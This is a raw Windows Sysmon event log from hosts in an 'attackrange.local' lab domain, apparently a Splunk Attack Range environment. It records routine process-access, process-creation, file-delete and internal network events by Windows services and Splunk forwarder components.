08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811126Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811125Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811124Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811123Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811122Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811121Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811120Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811119Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-048F-60E8-0500-00000000D001}412528C:\Windows\system32\csrss.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811118Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.746{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811117Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.731{0C1E0330-F92F-60EB-FE79-00000000D001}3328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000811116Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.215{0C1E0330-F92F-60EB-FD79-00000000D001}2612504C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811115Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811114Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811113Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811112Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811111Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811110Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811109Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811108Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811107Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811106Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811105Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-048F-60E8-0500-00000000D001}412428C:\Windows\system32\csrss.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000811104Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.058{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000811103Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:27.044{0C1E0330-F92F-60EB-FD79-00000000D001}2612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000811146Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:28.918{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD8F31FC9B29DC3FAED7B449A96C5809,SHA256=8841C7883F929E3AF82EBBAEFDC574564750E290FFA5C1C822E7C206F9B95EB4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:20.775{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62022-false10.0.1.12-8000- 23542300x80000000000000001055812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:28.052{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66DAB87FD7CB90DC0C57261271E87EAD,SHA256=7D1C84BF680280B8C0FDCC936C63572E337EA63D3F343EAA467606BD62102B1B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000811145Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 